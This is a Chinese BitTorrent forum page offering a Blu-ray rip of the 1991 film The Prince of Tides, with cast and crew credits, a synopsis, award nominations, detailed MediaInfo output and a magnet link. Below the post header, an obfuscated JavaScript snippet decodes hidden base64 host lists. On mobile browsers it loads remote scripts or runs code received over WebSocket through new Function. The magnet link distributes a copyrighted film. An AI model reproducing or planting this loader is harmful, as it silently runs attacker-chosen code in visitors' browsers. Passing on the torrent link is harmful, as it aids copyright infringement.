潮浪王子[简繁字幕].The.Prince.of.Tides.1991.Criterion.Collection.1080p.BluRay.x265.10bit.FLAC.MNHD 8.24GB

版主小s 26天前 152

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x46\x6a\x59\x48\x73\x4f\x52\x52\x45\x59']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9vamxza2pmLm5pYYW5nYYW94aWFuc2hlbmcuYY29t','d3NzOOi8vd3MuaG5qanNoLmNvbTo4MDgwLHdzczovL3dzLnFpbmdsaXh5LmNvbTo4MDgwLHdzczovL3dzLnppb24tbGl2ZXMuY29tOOjgwOODA=',window,document,['Y','O']);}:function(){};

◎译  名 潮浪王子 / 岁月惊涛
◎片  名 The Prince of Tides
◎年  代 1991
◎产  地 美国
◎类  别 剧情 / 爱情
◎语  言 英语
◎上映日期 1991-12-25
◎IMDb链接 https://www.imdb.com/title/tt0102713/
◎豆瓣评分 7.7/10 (712人评价)
◎豆瓣链接 https://movie.douban.com/subject/1297398/
◎片  长 132 分钟
◎导  演 芭芭拉·史翠珊 Barbra Streisand (id:1048139)
◎编  剧 派特·康洛伊 Pat Conroy (id:1041888)
       贝姬·约翰斯顿 Becky Johnston (id:1001267)
       贝基·琼斯顿 Becky Johnston (id:1287824)
◎演  员 尼克·诺特 Nick Nolte (id:1006989)
       芭芭拉·史翠珊 Barbra Streisand (id:1048139)
       Lindsay Wray Lindsay Wray (id:1041912)
       尼克·瑟西 Nick Searcy (id:1031994)
       梅林达·狄龙 Melinda Dillon (id:1027399)
       Jason Gould Jason Gould (id:1014106)
       布莱思·丹纳 Blythe Danner (id:1007014)
       凯特·尼利甘 Kate Nelligan (id:1032131)
       Nancy Moore Atchison Nancy Moore Atchison (id:1277530)
       杰罗恩·克拉比 Jeroen Krabbé (id:1036595)
       乔治·卡林 George Carlin (id:1048174)
       布拉德·苏利文 Brad Sullivan (id:1041292)
       Milton Clark Jr. Milton Clark Jr. (id:1072381)
       Bobby Fain Bobby Fain (id:1086550)
       鲍伯·汉纳 Bob Hannah (id:1099269)
       Kirk Whalum Kirk Whalum (id:1160741)
       Leon Watkins Leon Watkins (id:1161779)
       John Arceri John Arceri (id:1061161)
       西斯·科尔曼 Cis Corman (id:1281279)
       芭芭拉·史翠珊 Barbra Streisand (id:1048139)
       安德鲁·S·卡尔什 Andrew S. Karsch (id:1288143)
       詹姆斯·纽顿·霍华德 James Newton Howard (id:1019135)
       斯蒂芬·戈德布拉特 Stephen Goldblatt (id:1276362)
       唐·齐默尔曼 Don Zimmerman (id:1301742)
       Bonnie Finnegan Bonnie Finnegan (id:1283742)
       卡里尔·海勒 Caryl Heller (id:1286392)
       莱斯利·波普 Leslie A. Pope (id:1276528)
       保罗·席尔勃 Paul Sylbert (id:1001507)
       鲁斯·莫利 Ruth Morley (id:1043714)
       曼奥·罗切蒂 Manlio Rocchetti (id:1295835)
       科琳·卡拉甘 Colleen Callaghan (id:1279892)

◎标  签 美国 / 心理 / 爱情 / 芭芭拉·史翠珊 / 美国电影 / 心理治療 / 1991 / BarbraStreisand

◎简  介
  汤姆(尼克·诺特 Nick Nolte 饰)是一个典型的美国南方青年,早年间不堪回首的童年经历让他成长为了一个沉默寡言愤世嫉俗的男人,同这个虚与委蛇的世界格格不入。哥哥的死讯让汤姆本来就一团糟的生活陷入了更加彻底的颓废之中,他和妻子莎莉(布莱思·丹纳 Blythe Danner 饰)之间的感情亦因此遭遇了巨大的危机。                                    
                                汤姆有一个名为沙凡娜(梅林达·狄龙 Melinda Dillon 饰)只身一人在纽约闯荡,然而,她扬名立万的消息并非传来,传来的却是沙凡娜自杀未遂住进了精神病院的噩耗。苏珊(芭芭拉·史翠珊 Barbra Streisand 饰)是沙凡娜的主治医生,她发现了苏珊绝口不提的过去里隐藏着治愈她的秘方。于是,苏珊找到了汤姆,希望他能够助自己一臂之力。

◎获奖情况 (共7项)
  第64届奥斯卡金像奖 (1992)
  最佳影片(提名)
  最佳男主角(提名)
   └──尼克·诺特 (id:1006989)
  最佳女配角(提名)
   └──凯特·尼利甘 (id:1032131)
  最佳改编剧本(提名)
  最佳摄影(提名)
   └──斯蒂芬·戈德布拉特 (id:1276362)
  最佳艺术指导(提名)
  最佳原创配乐(提名)
   └──詹姆斯·纽顿·霍华德 (id:1019135)

  1. ##### MediaInfo ######

  2. General

  3. Unique ID                                : 191961510416369570586062118708197867904 (0x906A712DFE90FBE68065FE153C324180)

  4. Complete name                            : The.Prince.of.Tides.19[email protected]BBQDDQ.COM.mkv

  5. Format                                   : Matroska

  6. Format version                           : Version 4

  7. File size                                : 8.23 GiB

  8. Duration                                 : 2 h 12 min

  9. Overall bit rate mode                    : Variable

  10. Overall bit rate                         : 8 927 kb/s

  11. Encoded date                             : UTC 2021-08-27 09:41:28

  12. Writing application                      : mkvmerge v45.0.0 ('Heaven in Pennies') 64-bit

  13. Writing library                          : libebml v1.3.10 + libmatroska v1.5.2

  14. Cover                                    : Yes

  15. Attachments                              : cover


  16. Video

  17. ID                                       : 1

  18. Format                                   : HEVC

  19. Format/Info                              : High Efficiency Video Coding

  20. Format profile                           : Main [email protected]@High

  21. Codec ID                                 : V_MPEGH/ISO/HEVC

  22. Duration                                 : 2 h 12 min

  23. Bit rate                                 : 8 158 kb/s

  24. Width                                    : 1 920 pixels

  25. Height                                   : 1 032 pixels

  26. Display aspect ratio                     : 1.85:1

  27. Frame rate mode                          : Constant

  28. Frame rate                               : 23.976 (24000/1001/53354) FPS

  29. Color space                              : YUV

  30. Chroma subsampling                       : 4:2:0

  31. Bit depth                                : 10 bits

  32. Bits/(Pixel*Frame)                       : 0.172

  33. Stream size                              : 7.52 GiB (91%)

  34. Writing library                          : x265 3.5:[Linux][GCC 9.3.0][64 bit] 10bit

  35. Encoding settings                        : cpuid=533541111039 / frame-threads=5 / wpp / pmode / no-pme / no-psnr / no-ssim / log-level=2 / input-csp=1 / input-res=1920x1032 / interlace=0 / total-frames=189936 / level-idc=0 / high-tier=1 / uhd-bd=0 / ref=6 / no-allow-non-conformance / no-repeat-headers / annexb / no-aud / no-hrd / info / hash=0 / no-temporal-layers / no-open-gop / min-keyint=23 / keyint=250 / gop-lookahead=0 / bframes=8 / b-adapt=2 / b-pyramid / bframe-bias=0 / rc-lookahead=80 / lookahead-slices=0 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / hist-scenecut=0 / radl=0 / no-splice / no-intra-refresh / ctu=32 / min-cu-size=8 / no-rect / no-amp / max-tu-size=32 / tu-inter-depth=4 / tu-intra-depth=4 / limit-tu=0 / rdoq-level=2 / dynamic-rd=0.00 / no-ssim-rd / signhide / no-tskip / nr-intra=0 / nr-inter=0 / no-constrained-intra / strong-intra-smoothing / max-merge=5 / limit-refs=0 / no-limit-modes / me=3 / subme=7 / merange=57 / temporal-mvp / no-frame-dup / no-hme / weightp / weightb / no-analyze-src-pics / deblock=-3:-3 / no-sao / no-sao-non-deblock / rd=4 / selective-sao=0 / no-early-skip / no-rskip / no-fast-intra / no-tskip-fast / no-cu-lossless / b-intra / no-splitrd-skip / rdpenalty=0 / psy-rd=1.00 / psy-rdoq=1.00 / no-rd-refine / no-lossless / cbqpoffs=0 / crqpoffs=0 / rc=crf / crf=24.0 / qcomp=0.60 / qpstep=4 / stats-write=0 / stats-read=0 / vbv-maxrate=160000 / vbv-bufsize=160000 / vbv-init=0.9 / min-vbv-fullness=50.0 / max-vbv-fullness=80.0 / crf-max=0.0 / crf-min=0.0 / ipratio=1.30 / pbratio=1.20 / aq-mode=2 / aq-strength=1.00 / cutree / zone-count=0 / no-strict-cbr / qg-size=32 / no-rc-grain / qpmax=69 / qpmin=0 / no-const-vbv / sar=0 / overscan=0 / videoformat=5 / range=0 / colorprim=1 / transfer=1 / colormatrix=1 / chromaloc=0 / display-window=0 / cll=0,0 / min-luma=0 / max-luma=1023 / log2-max-poc-lsb=8 / vui-timing-info / vui-hrd-info / slices=1 / no-opt-qp-pps / no-opt-ref-list-length-pps / no-multi-pass-opt-rps / scenecut-bias=0.05 / hist-threshold=0.03 / no-opt-cu-delta-qp / no-aq-motion / no-hdr10 / no-hdr10-opt / no-dhdr10-opt / no-idr-recovery-sei / analysis-reuse-level=0 / analysis-save-reuse-level=0 / analysis-load-reuse-level=0 / scale-factor=0 / refine-intra=0 / refine-inter=0 / refine-mv=1 / refine-ctu-distortion=0 / no-limit-sao / ctu-info=0 / no-lowpass-dct / refine-analysis-type=0 / copy-pic=1 / max-ausize-factor=1.0 / no-dynamic-refine / no-single-sei / no-hevc-aq / no-svt / no-field / qp-adaptation-range=1.00 / scenecut-aware-qp=0conformance-window-offsets / right=0 / bottom=0 / NTMzNTQ= / decoder-max-rate=0 / no-vbv-live-multi-pass

  36. Default                                  : Yes

  37. Forced                                   : No

  38. Color range                              : Limited

  39. Color primaries                          : BT.709

  40. Transfer characteristics                 : BT.709

  41. Matrix coefficients                      : BT.709


  42. Audio #1

  43. ID                                       : 2

  44. Format                                   : FLAC

  45. Format/Info                              : Free Lossless Audio Codec

  46. Codec ID                                 : A_FLAC

  47. Duration                                 : 2 h 12 min

  48. Bit rate mode                            : Variable

  49. Bit rate                                 : 532 kb/s

  50. Channel(s)                               : 2 channels

  51. Channel layout                           : L R

  52. Sampling rate                            : 48.0 kHz

  53. Frame rate                               : 10.417 FPS (4608 SPF)

  54. Bit depth                                : 16 bits

  55. Compression mode                         : Lossless

  56. Stream size                              : 502 MiB (6%)

  57. Writing library                          : Lavf58.29.100

  58. Language                                 : English

  59. Default                                  : Yes

  60. Forced                                   : No


  61. Audio #2

  62. ID                                       : 3

  63. Format                                   : AC-3

  64. Format/Info                              : Audio Coding 3

  65. Commercial name                          : Dolby Digital

  66. Codec ID                                 : A_AC3

  67. Duration                                 : 2 h 12 min

  68. Bit rate mode                            : Constant

  69. Bit rate                                 : 192 kb/s

  70. Channel(s)                               : 1 channel

  71. Channel layout                           : C

  72. Sampling rate                            : 48.0 kHz

  73. Frame rate                               : 31.250 FPS (1536 SPF)

  74. Compression mode                         : Lossy

  75. Stream size                              : 181 MiB (2%)

  76. Language                                 : English

  77. Service kind                             : Complete Main

  78. Default                                  : No

  79. Forced                                   : No


  80. Text #1

  81. ID                                       : 4

  82. Format                                   : PGS

  83. Muxing mode                              : zlib

  84. Codec ID                                 : S_HDMV/PGS

  85. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs

  86. Duration                                 : 2 h 6 min

  87. Bit rate                                 : 73.0 kb/s

  88. Count of elements                        : 4659

  89. Stream size                              : 66.2 MiB (1%)

  90. Language                                 : English

  91. Default                                  : No

  92. Forced                                   : No


  93. Text #2

  94. ID                                       : 5

  95. Format                                   : PGS

  96. Muxing mode                              : zlib

  97. Codec ID                                 : S_HDMV/PGS

  98. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs

  99. Duration                                 : 2 h 10 min

  100. Bit rate                                 : 30.1 kb/s

  101. Count of elements                        : 3610

  102. Stream size                              : 28.2 MiB (0%)

  103. Title                                    : Simplified Chinese

  104. Language                                 : Chinese

  105. Default                                  : Yes

  106. Forced                                   : No


  107. Text #3

  108. ID                                       : 6

  109. Format                                   : PGS

  110. Muxing mode                              : zlib

  111. Codec ID                                 : S_HDMV/PGS

  112. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs

  113. Duration                                 : 2 h 10 min

  114. Bit rate                                 : 30.7 kb/s

  115. Count of elements                        : 3610

  116. Stream size                              : 28.7 MiB (0%)

  117. Title                                    : Traditional Chinese

  118. Language                                 : Chinese

  119. Default                                  : No

  120. Forced                                   : No


  121. Menu

  122. 00:00:00.000                             : en:Prologue

  123. 00:04:52.125                             : en:The Wingo family

  124. 00:11:52.420                             : en:Dr. Lowenstein

  125. 00:17:15.826                             : en:Keeping Savannah alive

  126. 00:23:56.184                             : en:Shrimp and dog food

  127. 00:29:48.828                             : en:Savannah's memory

  128. 00:32:03.171                             : en:"You're my favorite"

  129. 00:40:54.535                             : en:Eddie's party

  130. 00:46:31.747                             : en:Bernard

  131. 00:55:41.296                             : en:"The southern way"

  132. 01:02:24.574                             : en:Football practice

  133. 01:07:59.450                             : en:Birthdays past and present

  134. 01:14:58.827                             : en:Grandpa's shrimp boat

  135. 01:18:05.639                             : en:Tom and Lila

  136. 01:22:49.047                             : en:Tom's revelation

  137. 01:38:46.086                             : en:Manhattan dinner party

  138. 01:48:18.825                             : en:Love affair

  139. 01:58:35.024                             : en:Going home

  140. 02:07:30.434                             : en:End credits

  141. 02:12:01.663                             : en:Color bars



TAGS 剧情 爱情

磁力链:
  • magnet:?xt=urn:btih:2F23522CE88553644FE3D279B61C024C007B35C3
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回